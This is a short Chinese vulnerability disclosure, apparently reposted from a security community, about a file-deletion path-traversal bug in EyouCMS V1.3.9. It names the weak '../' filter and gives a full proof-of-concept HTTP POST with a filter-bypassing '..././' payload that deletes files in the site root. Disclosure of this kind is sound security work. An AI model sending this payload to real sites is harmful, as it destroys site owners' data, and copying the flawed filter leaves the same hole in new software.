EyouCMS-V1.3.9-UTF8-SP2,有一个删除站点图片的bug

2019-09-30 约 86 字 预计阅读 1 分钟

声明:本文 【EyouCMS-V1.3.9-UTF8-SP2,有一个删除站点图片的bug】 由作者 tang**** 于 2019-09-30 09:12:09 首发 先知社区 曾经 浏览数 665 次

感谢 tang**** 的辛苦付出!

菜鸟第一次发贴,大老们路过,笑笑就好.

bug等级: 低
bug文件:
\application\user\controller\Uploadify.php 66行
public function delupload()

$filename= str_replace('../','',$filename); // "../"过滤不够,  可以选择过滤..

复现方法:
必须登录上会员,随意注册一下就可以,

POST http://www.test.com/eyoucms/?m=user&c=uploadify&a=delupload HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 53
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.test.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.test.com/eyoucms/?m=user&c=Users&a=index
Accept-Language: zh-CN,zh;q=0.9
Host: www.test.com
Cookie: home_lang=cn; users_id=4; PHPSESSID=tcts5qdj6o18fvntoabt47o8v6; admin_lang=cn

//post内容
action=del&filename=xxx/xxx/4/..././..././..././favicon.ico
xxx/xxx/4 这个数字4必须参考Cookie 中users_id

post的filename被str_replace('../','',$filename)过滤后, 为xxx/xxx/4/../../../favicon.ico, 就是要网站根目录下了, favicon.ico成功被删除,

关键词:[‘安全技术’, ‘漏洞分析’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now